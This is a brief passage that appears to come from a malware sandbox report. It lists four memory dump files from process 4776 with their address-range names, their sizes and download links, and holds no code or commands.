                    • memory/4776-14683-0x00000000028F0000-0x0000000002970000-memory.dmp

                      Filesize

                      512KB

                      Download

                    • memory/4776-14685-0x0000000002670000-0x0000000002678000-memory.dmp

                      Filesize

                      32KB

                      Download

                    • memory/4776-14686-0x00000000028F0000-0x0000000002970000-memory.dmp

                      Filesize

                      512KB

                      Download

                    • memory/4776-14687-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

                      Filesize

                      9.6MB

                      Download